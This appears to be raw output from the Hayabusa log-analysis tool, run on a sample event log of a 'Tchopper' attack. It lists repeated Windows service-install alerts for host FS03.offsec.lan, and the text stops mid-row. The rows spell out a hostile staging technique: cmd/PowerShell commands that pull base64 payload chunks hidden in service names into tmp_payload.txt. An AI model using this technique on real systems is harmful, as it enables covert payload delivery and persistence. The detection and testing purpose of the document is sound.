MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append 